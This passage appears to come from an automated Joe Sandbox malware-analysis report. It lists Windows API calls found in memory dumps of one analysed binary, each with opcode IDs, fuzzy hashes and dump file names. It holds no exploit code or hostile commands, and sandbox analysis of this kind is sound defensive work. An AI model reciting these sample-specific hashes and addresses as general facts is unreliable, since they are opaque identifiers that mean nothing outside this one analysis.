                                                                                                                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                        • Instruction Fuzzy Hash: 2A012932100148BBDF126E95CC42EEB7BE9EF48B54F084094FE4896121C732EA61EBA0
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B213C6,00000000,00000000,?,00B5301A,00B213C6,00000000,00000000,00000000,?,00B5328B,00000006,FlsSetValue), ref: 00B530A5
                                                                                                                                        • GetLastError.KERNEL32(?,00B5301A,00B213C6,00000000,00000000,00000000,?,00B5328B,00000006,FlsSetValue,00BC2290,FlsSetValue,00000000,00000364,?,00B52E46), ref: 00B530B1
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B5301A,00B213C6,00000000,00000000,00000000,?,00B5328B,00000006,FlsSetValue,00BC2290,FlsSetValue,00000000), ref: 00B530BF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                        • Opcode ID: d2609cbce9ce86e16a8d0a103a40220112a3820340d457fa94ee7b8db32aad71
                                                                                                                                        • Instruction ID: 020931d88bbc62e026281864829d00f1490cd200457ed5db8a995876c5327c41
                                                                                                                                        • Opcode Fuzzy Hash: d2609cbce9ce86e16a8d0a103a40220112a3820340d457fa94ee7b8db32aad71
                                                                                                                                        • Instruction Fuzzy Hash: A601DD3231132297DB218A789C84B577BD8DF45FE271807A0FD05E7280CB21D905C6E0
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B8747F
                                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B87497
                                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B874AC
                                                                                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B874CA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1352324309-0
                                                                                                                                        • Opcode ID: 853a2b7fe6c63f3490d6e3448b1cc7cfb7f339c116965d8dac78c13c53b3ab8c
                                                                                                                                        • Instruction ID: 3f09c2c566779f23f15c66d9c0589db72ab362db08a8b027f92eef4fd15b7805
                                                                                                                                        • Opcode Fuzzy Hash: 853a2b7fe6c63f3490d6e3448b1cc7cfb7f339c116965d8dac78c13c53b3ab8c
                                                                                                                                        • Instruction Fuzzy Hash: BD11A1B12453109BE720DF54EC48F927FFCEB00B18F2485A9A656D7261DBB0EA04DBA0
                                                                                                                                        APIs
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B8ACD3,?,00008000), ref: 00B8B0C4
                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B8ACD3,?,00008000), ref: 00B8B0E9
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B8ACD3,?,00008000), ref: 00B8B0F3
                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B8ACD3,?,00008000), ref: 00B8B126
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                        • Opcode ID: 3e7158b6575a7f008958e3d1b8c318b9b7f36ee2e83bed204d8430f800c500e3
                                                                                                                                        • Instruction ID: 93c7156089ffe7413c3f3bb3c0765be2ac730093c6148fce15ba7f980d8f961e
                                                                                                                                        • Opcode Fuzzy Hash: 3e7158b6575a7f008958e3d1b8c318b9b7f36ee2e83bed204d8430f800c500e3
                                                                                                                                        • Instruction Fuzzy Hash: FD112731C01529E7CF00FFA8E998AEEBFB8FB09711F104186D991B6191CB709650CB51
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00BB7E33
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00BB7E4B
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00BB7E6F
                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BB7E8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                        • Opcode ID: dee2a9dd37575b191f3e99fb55d6a25e588ed37a0dbe2d1914ba4cd915e01b71
                                                                                                                                        • Instruction ID: 7f8a96f9cc8ec9ee6595154a75a3b3c96018792124819caf3be5b72d5ddd1da6
                                                                                                                                        • Opcode Fuzzy Hash: dee2a9dd37575b191f3e99fb55d6a25e588ed37a0dbe2d1914ba4cd915e01b71
                                                                                                                                        • Instruction Fuzzy Hash: 1D1156B9D0020AAFDB41CF99C8849EEBBF9FF08310F5051A6E915E3210DB75AA54CF50
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B82DC5
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B82DD6
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B82DDD
                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B82DE4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                        • Opcode ID: 49f0e542ee83f219b2721b8444a89f036fcbcb8010274cf031075e6c69b64b4e
                                                                                                                                        • Instruction ID: e3459110870f271cd8c08ec1b2a30cda1e84e5d222d10852ab7e0e1c20655b5a
                                                                                                                                        • Opcode Fuzzy Hash: 49f0e542ee83f219b2721b8444a89f036fcbcb8010274cf031075e6c69b64b4e
                                                                                                                                        • Instruction Fuzzy Hash: 7CE06D725012247BD7206B629C0DEEB3FACEB42BA1F100265B906E30909AE0C840C7B0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B39693
                                                                                                                                          • Part of subcall function 00B39639: SelectObject.GDI32(?,00000000), ref: 00B396A2
                                                                                                                                          • Part of subcall function 00B39639: BeginPath.GDI32(?), ref: 00B396B9
                                                                                                                                          • Part of subcall function 00B39639: SelectObject.GDI32(?,00000000), ref: 00B396E2
                                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00BB8887
                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 00BB8894
                                                                                                                                        • EndPath.GDI32(?), ref: 00BB88A4
                                                                                                                                        • StrokePath.GDI32(?), ref: 00BB88B2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                        • Opcode ID: 88ff696de2cb1b35fe4ace85d3e09f21e1fe1dbf0b88953ae21eff7bf6f9d63b
                                                                                                                                        • Instruction ID: f10df7a89b7e51703b22b10882ddd7db1f11d367a8a25e46d822ebbc16d08416
                                                                                                                                        • Opcode Fuzzy Hash: 88ff696de2cb1b35fe4ace85d3e09f21e1fe1dbf0b88953ae21eff7bf6f9d63b
                                                                                                                                        • Instruction Fuzzy Hash: 0FF05E36041259FBDB12AF98AC0AFDE3F59AF06310F448140FA11660E2CBF55511CFE5
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000008), ref: 00B398CC
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00B398D6
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00B398E9
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00B398F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4037423528-0
                                                                                                                                        • Opcode ID: 9b3f4fb47bf48be543f9809dac943811486afec0475d4b5d6953bc40d55a0560
                                                                                                                                        • Instruction ID: 2422308ed270f533675613dd2625f70d99aa60f2311f703fbd8ad36db757a470
                                                                                                                                        • Opcode Fuzzy Hash: 9b3f4fb47bf48be543f9809dac943811486afec0475d4b5d6953bc40d55a0560
                                                                                                                                        • Instruction Fuzzy Hash: BEE06531244640ABDB219B78AC09BD83F60EB11335F14C359F6F9690E1CBB146409B10
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00B81634
                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B811D9), ref: 00B8163B
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B811D9), ref: 00B81648
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B811D9), ref: 00B8164F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3974789173-0
                                                                                                                                        • Opcode ID: f29d16970f65f473a3f6126b7b5013334df6c1868eb49959bc6d2c1eb8566894
                                                                                                                                        • Instruction ID: f4af91e05d4e0ff3666b77e994d018bd8fab012d60099aa2073573274e464df4
                                                                                                                                        • Opcode Fuzzy Hash: f29d16970f65f473a3f6126b7b5013334df6c1868eb49959bc6d2c1eb8566894
                                                                                                                                        • Instruction Fuzzy Hash: 15E08631602211DBD7206FA49D0DB863FBCEF44791F184958F285CA090EAB48441C764
                                                                                                                                        APIs
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00B7D858
                                                                                                                                        • GetDC.USER32(00000000), ref: 00B7D862
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B7D882
                                                                                                                                        • ReleaseDC.USER32(?), ref: 00B7D8A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        • Opcode ID: daaebd4292bc20b3f057ba06ac9553b1be9d984c111254372a6534dff48af39d
                                                                                                                                        • Instruction ID: 53717a5062addf9a18f995475cb73a66dbe3d9b218cd6abadb7ff7ccc1184977
                                                                                                                                        • Opcode Fuzzy Hash: daaebd4292bc20b3f057ba06ac9553b1be9d984c111254372a6534dff48af39d
                                                                                                                                        • Instruction Fuzzy Hash: A7E01AB4C00204DFCB41EFA4D948A6DBFF1FB48310F208149E80AE7250CB784901EF50
                                                                                                                                        APIs
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00B7D86C
                                                                                                                                        • GetDC.USER32(00000000), ref: 00B7D876
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B7D882
                                                                                                                                        • ReleaseDC.USER32(?), ref: 00B7D8A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        • Opcode ID: f408153da95a8542ce938ebfa45110e8f6d9791c29fc7573f31060bb7325da6f
                                                                                                                                        • Instruction ID: a17761e1e83680438f404cd6d803fd02a4e0ea3a1a3a9fba5855ca8803682549
                                                                                                                                        • Opcode Fuzzy Hash: f408153da95a8542ce938ebfa45110e8f6d9791c29fc7573f31060bb7325da6f
                                                                                                                                        • Instruction Fuzzy Hash: EFE092B5C04204EFCB51EFA4E948A6DBFF5BB48311F248549E94AE7250CBB85905EF50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B27620: _wcslen.LIBCMT ref: 00B27625
                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B94ED4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Connection_wcslen
                                                                                                                                        • String ID: *$LPT
                                                                                                                                        • API String ID: 1725874428-3443410124
                                                                                                                                        • Opcode ID: 6ee926eff794557121bfa91abbe07aa422f039895d26dfb8d3266d378f707c5a
                                                                                                                                        • Instruction ID: bbbcf441f89ae64ad8c2c7a0e6ecc8b90b860f3e88b3cf8a985d4c0b98959502
                                                                                                                                        • Opcode Fuzzy Hash: 6ee926eff794557121bfa91abbe07aa422f039895d26dfb8d3266d378f707c5a
                                                                                                                                        • Instruction Fuzzy Hash: 19915E75A002159FCB14DF58C494EAABBF1EF48304F1980E9E80A9F762D771ED86CB91
                                                                                                                                        APIs
                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00B4E30D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                        • String ID: pow
                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                        • Opcode ID: d882dde8ae865c9ae3925ea1b69706102377bc2638c418fc0bdbfdd1ba90f0a3
                                                                                                                                        • Instruction ID: 7c08e7eff2cebc551c0ffcf2fe3ae1f17256bacdbb15e5a2f1d0bb2e39c3ae2e
                                                                                                                                        • Opcode Fuzzy Hash: d882dde8ae865c9ae3925ea1b69706102377bc2638c418fc0bdbfdd1ba90f0a3
                                                                                                                                        • Instruction Fuzzy Hash: 48517061B4C20296DB177B14E9427793BE8FB40742F304DE8E8E5432E9DF31CD99AA46
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: #
                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                        • Opcode ID: 694e0a9a61ce969c9603b03ebbf5f6e9b15cc505d7307e086bc25b6b3552bb8d
                                                                                                                                        • Instruction ID: 297ebc78f411eb354c4fbb70dd62bc798882604f3e2bc62c740191003690fee2
                                                                                                                                        • Opcode Fuzzy Hash: 694e0a9a61ce969c9603b03ebbf5f6e9b15cc505d7307e086bc25b6b3552bb8d
                                                                                                                                        • Instruction Fuzzy Hash: DB510235504246DFDB19DF68C481ABA7BE8EF19310F2480D6E8B59B2D0DA34DD52CBA1
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00B3F2A2
                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B3F2BB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                        • Opcode ID: 592e50c7a697919d498adacf4860b7054c3616ca2d7b5ecb285049481dc3c3ad
                                                                                                                                        • Instruction ID: 3a1effe95ddf1d1158885e3b5f4fc25d18d4667be41b4b238d9dbd732828b115
                                                                                                                                        • Opcode Fuzzy Hash: 592e50c7a697919d498adacf4860b7054c3616ca2d7b5ecb285049481dc3c3ad
                                                                                                                                        • Instruction Fuzzy Hash: 7A512771408744ABD320AF54EC86BAFBBF8FB84300F81889DF1D942195EF708529CB66
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00BA57E0
                                                                                                                                        • _wcslen.LIBCMT ref: 00BA57EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                                                                        • String ID: CALLARGARRAY
                                                                                                                                        • API String ID: 157775604-1150593374
                                                                                                                                        • Opcode ID: 00794c2e62ffe143ff559ad77494e55124b7c4967d01bc65fccb362da9f79efb
                                                                                                                                        • Instruction ID: de7d03f7ad69bf6277544a0f64043f2b742172c94282f9838c3b3080296cc069
